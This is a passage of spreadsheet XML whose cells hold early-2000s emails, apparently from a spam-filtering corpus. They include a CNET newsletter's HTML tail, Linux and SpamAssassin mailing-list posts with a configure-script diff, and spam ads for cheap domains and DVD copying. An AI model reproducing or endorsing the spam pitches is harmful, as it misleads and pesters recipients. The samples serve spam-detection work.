                         &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIm1AfPI8e0dAVJ9PZAKTrR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJQNJijeftdxQMKtNX8PQiR"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href="http://clickthru.online.com/Click?q=c5-8BcDQzO4TxlnAJMzSROUJEymxqPR" &gt;
 SAP's sales sagging&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUP7l4Ba9sBbjsMVKpv3DxnR" &gt;
 EMC breaks even&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkx5ZM31HOqBxDVAmoBameR" &gt;
 TI boosts Sun's UltraSparc chip&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQcTfhLUsY98BbBL7kOi_yR" &gt;
 Tech stocks wallow in earnings funk&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rcge7KMLcKMZ2Fz8IR7XlR" &gt;
 Corporations favor age, experience&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiKj5MjbWx_ktQ3DlPfP8N4R" &gt;
 E*Trade profit up on cost cuts&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJ3L8Sy_rk9Z5VKc-3P0BcR" &gt;
 KPNQwest network's shutdown imminent&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=59-y53oIEn9utsyw3vlpW-B_KMqztFR" &gt;
 WorldCom may file bankruptcy next week&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyEG1De0fbrQA5K-fxuEL59R" &gt;
 Level 3 gives mixed signals on recovery&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJq_Z-68gWtuoAABMMPZ9rR" &gt;
 Record labels target Chinese portals&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_z4Y8MMqsnCW5CH7esbKRiR" &gt;
 AOL's accounting scrutinized&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEpaIcKN3PQhaIHsSzky0PR" &gt;
 Some Beijing Net cafes reopen&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEDqU6LoiigVnxXFZcIuInR" &gt;
 Trying to connect at Macworld&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWDyUL0DzRRmBekeVktk2eR" &gt;
 ATI uncovers comeback chips&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy13z69urJ1kOqFb2GVaGyR" &gt;
 Apple's .Mac faces a hard sell&lt;/a&gt;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href="http://clickthru.online.com/Click?q=01-9oXDI2jxOqf18rwvurMPGPxZ6RlR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=17-agPtzOXSeKZnaGiMzyFlCX5t7RJ8gRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0kqhD91K2c-r7MBvWpjuyR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKzoKjjE1UU5CfCkxHB0FFR"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href="http://clickthru.online.com/Click?q=56-NwKYInnwtkh9pFOrctPQDwwaMC9R" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEXs-sagOO80ywQ-4d0P6cR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0J6P1AF62oaDkjVsTLZ8iR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdKmP0t9r3r1yZeU_u_KnPR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUQ1CMwl8rWLXZBXqONOVnR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZQwRxZ4Gc5w8PF_jEuwteR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d5-p-Si-vLA49jcYoogRFir-4gvy9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Backup solutions
</t>
  </si>
  <si>
    <t xml:space="preserve">Use Amanda at http://www.amanda.org/
 Donncha.
 On Friday 16 August 2002 15:09, Ciaran Johnston wrote:
 &gt; Hi folks,
 &gt; I maintain a colocated server on behalf of a small group of individuals,
 &gt; and am looking at backup solutions. Is it possible to get some sort of low-
 &gt; end internal tape / other solution that could be used to back up approx. 40
 &gt; Gigs of data or am I just dreaming? My ISP does offer backups at extra cost
 &gt; but the only problem with that is, well, the extra cost.
 &gt;
 &gt; What I was hoping to do was to install some kind of internal tape device,
 &gt; then swap tapes round every month, so I had an onsite backup of say the
 &gt; last 24 hours and an offsite backup of the last month. Is this feasible?
 &gt; I'm beginning to think it isn't. External devices are not an option as part
 &gt; of the charge for colocation is rackspace.
 &gt;
 &gt; Thanks,
 &gt; Ciaran.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin configure,1.1.2.1,1.1.2.2
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin
 In directory usw-pr-cvs1:/tmp/cvs-serv15398
 Modified Files:
       Tag: b2_4_0
 	configure configure.in 
 Log Message:
 NetBSD support patch from Klaus Heinz, bug 785
 Index: configure
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/configure,v
 retrieving revision 1.1.2.1
 retrieving revision 1.1.2.2
 diff -b -w -u -d -r1.1.2.1 -r1.1.2.2
 --- configure	27 Aug 2002 23:07:13 -0000	1.1.2.1
 +++ configure	28 Aug 2002 23:29:04 -0000	1.1.2.2
 @@ -1273,18 +1273,22 @@
                   cat &gt; conftest.$ac_ext &lt;&lt;EOF
  #line 1275 "configure"
  #include "confdefs.h"
 +#include &lt;sys/types.h&gt;
  #include &lt;sys/socket.h&gt;
 +int main() {
 +printf ("%d", SHUT_RD); return 0;
 +; return 0; }
  EOF
 -if (eval "$ac_cpp conftest.$ac_ext") 2&gt;&amp;5 |
 -  egrep "SHUT_RD" &gt;/dev/null 2&gt;&amp;1; then
 +if { (eval echo configure:1283: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
    rm -rf conftest*
    shutrd=yes
  else
 +  echo "configure: failed program was:" &gt;&amp;5
 +  cat conftest.$ac_ext &gt;&amp;5
    rm -rf conftest*
    shutrd=no
  fi
 -rm -f conftest*
 -
 +rm -f conftest*,
  fi
 @@ -1298,7 +1302,7 @@
  echo $ac_n "checking for socket in -lsocket""... $ac_c" 1&gt;&amp;6
 -echo "configure:1302: checking for socket in -lsocket" &gt;&amp;5
 +echo "configure:1306: checking for socket in -lsocket" &gt;&amp;5
  ac_lib_var=`echo socket'_'socket | sed 'y%./+-%__p_%'`
  if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 @@ -1306,7 +1310,7 @@
    ac_save_LIBS="$LIBS"
  LIBS="-lsocket  $LIBS"
  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1310 "configure"
 +#line 1314 "configure"
  #include "confdefs.h"
  /* Override any gcc2 internal prototype to avoid an error.  */
  /* We use char because int might match the return type of a gcc2
 @@ -1317,7 +1321,7 @@
  socket()
  ; return 0; }
  EOF
 -if { (eval echo configure:1321: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
 +if { (eval echo configure:1325: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
    rm -rf conftest*
    eval "ac_cv_lib_$ac_lib_var=yes"
  else
 @@ -1345,7 +1349,7 @@
  fi
  echo $ac_n "checking for connect in -linet""... $ac_c" 1&gt;&amp;6
 -echo "configure:1349: checking for connect in -linet" &gt;&amp;5
 +echo "configure:1353: checking for connect in -linet" &gt;&amp;5
  ac_lib_var=`echo inet'_'connect | sed 'y%./+-%__p_%'`
  if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 @@ -1353,7 +1357,7 @@
    ac_save_LIBS="$LIBS"
  LIBS="-linet  $LIBS"
  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1357 "configure"
 +#line 1361 "configure"
  #include "confdefs.h"
  /* Override any gcc2 internal prototype to avoid an error.  */
  /* We use char because int might match the return type of a gcc2
 @@ -1364,7 +1368,7 @@
  connect()
  ; return 0; }
  EOF
 -if { (eval echo configure:1368: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
 +if { (eval echo configure:1372: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
    rm -rf conftest*
    eval "ac_cv_lib_$ac_lib_var=yes"
  else
 @@ -1392,7 +1396,7 @@
  fi
  echo $ac_n "checking for t_accept in -lnsl""... $ac_c" 1&gt;&amp;6
 -echo "configure:1396: checking for t_accept in -lnsl" &gt;&amp;5
 +echo "configure:1400: checking for t_accept in -lnsl" &gt;&amp;5
  ac_lib_var=`echo nsl'_'t_accept | sed 'y%./+-%__p_%'`
  if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 @@ -1400,7 +1404,7 @@
    ac_save_LIBS="$LIBS"
  LIBS="-lnsl  $LIBS"
  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1404 "configure"
 +#line 1408 "configure"
  #include "confdefs.h"
  /* Override any gcc2 internal prototype to avoid an error.  */
  /* We use char because int might match the return type of a gcc2
 @@ -1411,7 +1415,7 @@
  t_accept()
  ; return 0; }
  EOF
 -if { (eval echo configure:1415: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
 +if { (eval echo configure:1419: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
    rm -rf conftest*
    eval "ac_cv_lib_$ac_lib_var=yes"
  else
 @@ -1439,7 +1443,7 @@
  fi
  echo $ac_n "checking for dlopen in -ldl""... $ac_c" 1&gt;&amp;6
 -echo "configure:1443: checking for dlopen in -ldl" &gt;&amp;5
 +echo "configure:1447: checking for dlopen in -ldl" &gt;&amp;5
  ac_lib_var=`echo dl'_'dlopen | sed 'y%./+-%__p_%'`
  if eval "test \"`echo '$''{'ac_cv_lib_$ac_lib_var'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
 @@ -1447,7 +1451,7 @@
    ac_save_LIBS="$LIBS"
  LIBS="-ldl  $LIBS"
  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1451 "configure"
 +#line 1455 "configure"
  #include "confdefs.h"
  /* Override any gcc2 internal prototype to avoid an error.  */
  /* We use char because int might match the return type of a gcc2
 @@ -1458,7 +1462,7 @@
  dlopen()
  ; return 0; }
  EOF
 -if { (eval echo configure:1462: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
 +if { (eval echo configure:1466: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
    rm -rf conftest*
    eval "ac_cv_lib_$ac_lib_var=yes"
  else
 @@ -1489,12 +1493,12 @@
  for ac_func in socket strdup strtod strtol snprintf shutdown
  do
  echo $ac_n "checking for $ac_func""... $ac_c" 1&gt;&amp;6
 -echo "configure:1493: checking for $ac_func" &gt;&amp;5
 +echo "configure:1497: checking for $ac_func" &gt;&amp;5
  if eval "test \"`echo '$''{'ac_cv_func_$ac_func'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
  else
    cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1498 "configure"
 +#line 1502 "configure"
  #include "confdefs.h"
  /* System header to define __stub macros and hopefully few prototypes,
      which can conflict with char $ac_func(); below.  */
 @@ -1517,7 +1521,7 @@
  ; return 0; }
  EOF
 -if { (eval echo configure:1521: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
 +if { (eval echo configure:1525: \"$ac_link\") 1&gt;&amp;5; (eval $ac_link) 2&gt;&amp;5; } &amp;&amp; test -s conftest${ac_exeext}; then
    rm -rf conftest*
    eval "ac_cv_func_$ac_func=yes"
  else
 @@ -1544,20 +1548,20 @@
  echo $ac_n "checking for h_errno""... $ac_c" 1&gt;&amp;6
 -echo "configure:1548: checking for h_errno" &gt;&amp;5
 +echo "configure:1552: checking for h_errno" &gt;&amp;5
  if eval "test \"`echo '$''{'herrno'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
  else
                  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1554 "configure"
 +#line 1558 "configure"
  #include "confdefs.h"
  #include &lt;netdb.h&gt;
  int main() {
  printf ("%d", h_errno); return 0;
  ; return 0; }
  EOF
 -if { (eval echo configure:1561: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
 +if { (eval echo configure:1565: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
    rm -rf conftest*
    herrno=yes
  else
 @@ -1580,20 +1584,20 @@
  echo $ac_n "checking for optarg""... $ac_c" 1&gt;&amp;6
 -echo "configure:1584: checking for optarg" &gt;&amp;5
 +echo "configure:1588: checking for optarg" &gt;&amp;5
  if eval "test \"`echo '$''{'haveoptarg'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
  else
                  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1590 "configure"
 +#line 1594 "configure"
  #include "confdefs.h"
  #include &lt;getopt.h&gt;
  int main() {
  if (optarg == (char *) 0L) { return 0; } return 1;
  ; return 0; }
  EOF
 -if { (eval echo configure:1597: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
 +if { (eval echo configure:1601: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
    rm -rf conftest*
    haveoptarg=yes
  else
 @@ -1616,20 +1620,21 @@
  echo $ac_n "checking for in_addr_t""... $ac_c" 1&gt;&amp;6
 -echo "configure:1620: checking for in_addr_t" &gt;&amp;5
 +echo "configure:1624: checking for in_addr_t" &gt;&amp;5
  if eval "test \"`echo '$''{'inaddrt'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
  else
                  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1626 "configure"
 +#line 1630 "configure"
  #include "confdefs.h"
 +#include &lt;sys/types.h&gt;
  #include &lt;netinet/in.h&gt;
  int main() {
  in_addr_t foo; return 0;
  ; return 0; }
  EOF
 -if { (eval echo configure:1633: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
 +if { (eval echo configure:1638: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
    rm -rf conftest*
    inaddrt=yes
  else
 @@ -1645,12 +1650,12 @@
  echo "$ac_t""$inaddrt" 1&gt;&amp;6
  if test $inaddrt = no ; then
    echo $ac_n "checking for in_addr_t""... $ac_c" 1&gt;&amp;6
 -echo "configure:1649: checking for in_addr_t" &gt;&amp;5
 +echo "configure:1654: checking for in_addr_t" &gt;&amp;5
  if eval "test \"`echo '$''{'ac_cv_type_in_addr_t'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
  else
    cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1654 "configure"
 +#line 1659 "configure"
  #include "confdefs.h"
  #include &lt;sys/types.h&gt;
  #if STDC_HEADERS
 @@ -1681,20 +1686,21 @@
  echo $ac_n "checking for INADDR_NONE""... $ac_c" 1&gt;&amp;6
 -echo "configure:1685: checking for INADDR_NONE" &gt;&amp;5
 +echo "configure:1690: checking for INADDR_NONE" &gt;&amp;5
  if eval "test \"`echo '$''{'haveinaddrnone'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
  else
                  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1691 "configure"
 +#line 1696 "configure"
  #include "confdefs.h"
 +#include &lt;sys/types.h&gt;
  #include &lt;netinet/in.h&gt;
  int main() {
  in_addr_t foo = INADDR_NONE; return 0;
  ; return 0; }
  EOF
 -if { (eval echo configure:1698: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
 +if { (eval echo configure:1704: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
    rm -rf conftest*
    haveinaddrnone=yes
  else
 @@ -1717,20 +1723,23 @@
  echo $ac_n "checking for EX__MAX""... $ac_c" 1&gt;&amp;6
 -echo "configure:1721: checking for EX__MAX" &gt;&amp;5
 +echo "configure:1727: checking for EX__MAX" &gt;&amp;5
  if eval "test \"`echo '$''{'haveexmax'+set}'`\" = set"; then
    echo $ac_n "(cached) $ac_c" 1&gt;&amp;6
  else
                  cat &gt; conftest.$ac_ext &lt;&lt;EOF
 -#line 1727 "configure"
 +#line 1733 "configure"
  #include "confdefs.h"
 +#ifdef HAVE_SYSEXITS_H
 +#include &lt;sysexits.h&gt;
 +#endif
  #include &lt;errno.h&gt;
  int main() {
  int foo = EX__MAX; return 0;
  ; return 0; }
  EOF
 -if { (eval echo configure:1734: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
 +if { (eval echo configure:1743: \"$ac_compile\") 1&gt;&amp;5; (eval $ac_compile) 2&gt;&amp;5; }; then
    rm -rf conftest*
    haveexmax=yes
  else
 Index: configure.in
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/configure.in,v
 retrieving revision 1.1.2.1
 retrieving revision 1.1.2.2
 diff -b -w -u -d -r1.1.2.1 -r1.1.2.2
 --- configure.in	27 Aug 2002 23:07:13 -0000	1.1.2.1
 +++ configure.in	28 Aug 2002 23:29:04 -0000	1.1.2.2
 @@ -26,9 +26,11 @@
  AC_CACHE_CHECK([for SHUT_RD],
         shutrd, [
 -                 AC_EGREP_HEADER(SHUT_RD, sys/socket.h,
 +                AC_TRY_COMPILE([#include &lt;sys/types.h&gt;
 +#include &lt;sys/socket.h&gt;],
 +                        [printf ("%d", SHUT_RD); return 0;],
                                          [shutrd=yes],
 -                                        [shutrd=no])
 +                                        [shutrd=no]),
         ])
  if test $shutrd = yes ; then
    AC_DEFINE(HAVE_SHUT_RD)
 @@ -73,7 +75,8 @@
  AC_CACHE_CHECK([for in_addr_t],
          inaddrt, [
 -                AC_TRY_COMPILE([#include &lt;netinet/in.h&gt;],
 +                AC_TRY_COMPILE([#include &lt;sys/types.h&gt;
 +#include &lt;netinet/in.h&gt;],
                          [in_addr_t foo; return 0;],
                                          [inaddrt=yes],
                                          [inaddrt=no]),
 @@ -86,7 +89,8 @@
  AC_CACHE_CHECK([for INADDR_NONE],
          haveinaddrnone, [
 -                AC_TRY_COMPILE([#include &lt;netinet/in.h&gt;],
 +                AC_TRY_COMPILE([#include &lt;sys/types.h&gt;
 +#include &lt;netinet/in.h&gt;],
                          [in_addr_t foo = INADDR_NONE; return 0;],
                                          [haveinaddrnone=yes],
                                          [haveinaddrnone=no]),
 @@ -99,7 +103,10 @@
  AC_CACHE_CHECK([for EX__MAX],
          haveexmax, [
 -                AC_TRY_COMPILE([#include &lt;errno.h&gt;],
 +                AC_TRY_COMPILE([#ifdef HAVE_SYSEXITS_H
 +#include &lt;sysexits.h&gt;
 +#endif
 +#include &lt;errno.h&gt;],
                          [int foo = EX__MAX; return 0;],
                                          [haveexmax=yes],
                                          [haveexmax=no]),
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $14.95 per year for .COM, .BIZ, and .INFO extensions
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT INFORMATION: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http://www.affordable-domains.com today for more info.
 Register your domain name today for just $14.95 at: http://www.affordable-domains.com/  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Affordable Domains
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 (g1-ss2)5592OxeR3-424uQKh2259kCdl5-189GEil31
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Thursday July 18
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.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Software
     Sun's Java-Liberty moves risk industry scuffles
     It's a trust thing
         http://www.theregister.co.uk/content/4/26234.html
     MS white paper says Palladium open, clean, not DRM
     Quite plausibly, too. They're really trying very hard here...
         http://www.theregister.co.uk/content/4/26231.html
 Semiconductors
     Itanic OEM slams Itanic
     Never mind our servers, it's b*ll*cks
         http://www.theregister.co.uk/content/3/26248.html
 Internet
     Apple joins in 'end of free Internet' bandwagon
     Cough up or else
         http://www.theregister.co.uk/content/6/26244.html
     Team demos 'first quantum crypto prototype machine'
     The secret comes out of the lab
         http://www.theregister.co.uk/content/6/26243.html
     BT suspends techie over Angus Deayton phone tap claim
     Man arrested
         http://www.theregister.co.uk/content/6/26242.html
     Energis shareholders are revolting
     Create Web site to 'fight for small investor'
         http://www.theregister.co.uk/content/6/26240.html
     Domain Registry of Europe defends tactics, sues Tucows
     Says it says here, not a bill
         http://www.theregister.co.uk/content/6/26239.html
     MS to charge for MSN 8 browser - msn.co.uk for chop?
     Seems to be losing interest in the things MSN UK does
         http://www.theregister.co.uk/content/6/26238.html
     Oftel rejects BT break-up call
     Reckons it can handle BT
         http://www.theregister.co.uk/content/6/26233.html
 Net Security
     'Hacker' security biz built on FBI snitches
     Gweeds gets L0pht/@Stake's number
         http://www.theregister.co.uk/content/55/26247.html
     Team demos 'first quantum crypto prototype machine'
     The secret comes out of the lab
         http://www.theregister.co.uk/content/55/26243.html
     NetIQ claims detects Hacktivismo tool
     Spoilsports?
         http://www.theregister.co.uk/content/55/26235.html
 Business
     HP confirms 150 suspended in email porn probe
     Disciplinary process
         http://www.theregister.co.uk/content/7/26246.html
     Apple earnings fall but meet forecasts 
     Whatever
         http://www.theregister.co.uk/content/7/26245.html
     Europe extends employment rules to teleworkers
     Three year transition period
         http://www.theregister.co.uk/content/7/26241.html
     Energis reborn as 'Chelys,' but still called Energis
     Bankers move in
         http://www.theregister.co.uk/content/7/26237.html
     Motorola chalks up biggest ever loss, but returns to profit
     It's the way you tell them...
         http://www.theregister.co.uk/content/7/26236.html
 The Mac Channel
     Mac drought fails to lift Street, spirits
     Widescreen iMac, iPod... er, that's it
         http://www.theregister.co.uk/content/39/26249.html
 Bootnotes
     Vulture Central welcomes new hatchling
     Bouncing baby boy joins nest
         http://www.theregister.co.uk/content/28/26232.html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</si>
  <si>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Dan Kohn &lt;dan@dankohn.com&gt; writes:
 &gt; Guys, the Habeas Infringers List (HIL) exists explicitly to deal with
 &gt; spammers while we're getting judgments against them and especially in
 &gt; other countries, where those judgments are harder to get.
 My concern doesn't stem from failing to understand how your business is
 intended to work.  My concern is the lack of empirical evidence that it
 will reduce the amount of uncaught spam.
 &gt; Please note that nobody has ever had an incentive before to go after
 &gt; regular spammers.  Yes, some attorneys general have prosecuted blatant
 &gt; pyramid schemes, and ISPs have won some theft of service suits, but
 &gt; the vast majority of spammers go forward with out any legal hassles.
 &gt; So, I can't understand how Daniel can assert that you can't track
 &gt; spammers down when it's never really been tried.
 Please don't misquote me.  I did not assert that you "can't track
 spammers".  Here is what I said:
 | It will be difficult to find, prosecute, and win money from someone in
 | various non-friendly countries where spam originates (China is a good
 | example) even if they do officially "respect" copyright law.
 I understand the incentive that you have to pursue spammers, but that
 does not directly translate to less spam being sent to my inbox.  It is
 an indirect effect and the magnitude of the effect may not be sufficient
 to counteract the ease with which a -20 score on the mark allows spam to
 avoid being tagged as spam.
 &gt; Daniel, it's easy enough for you to change the Habeas scores yourself
 &gt; on your installation.  If Habeas fails to live up to its promise to
 &gt; only license the warrant mark to non-spammers and to place all
 &gt; violators on the HIL, then I have no doubt that Justin and Craig will
 &gt; quickly remove us from the next release.  But, you're trying to kill
 &gt; Habeas before it has a chance to show any promise.
 I think I've worked on SA enough to understand that I can localize a
 score.  I'm just not comfortable with using SpamAssassin as a vehicle
 for drumming up your business at the expense of our user base.
 I think it would make more sense to start Habeas with a less aggressive
 score (one which will not give spammers a quick path into everyone's
 inbox) and after we've seen evidence that the system works, then we can
 increase the magnitude of the score.
 Dan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</si>
  <si>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This product appeals to all DVD lovers 9959GLXz3-738HFdN8831kbee5--25
</t>
  </si>
  <si>
    <t xml:space="preserve">Copy DVD Movies?
 Yes!  Copy and burn your own DVD
 movies and video with a CD-R Drive.
 * All Software Included On CD
 * Step by Step Instructions
 * No DVD Burner Required
 * We ship all orders within 72 hours!
 * 30 Day "NO Risk Trial".
 So don't delay...get your copy TODAY!
 http://209.163.187.46/dvd
 +++++++++++++++++++++++++++++++++++++++++++
 To "Opt-Out"
 http://209.163.187.46/options/
 5275MPdA5-850BRBf9054xgTa4-379luJl31
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: hi 56281814119876554443333
</t>
  </si>
  <si>
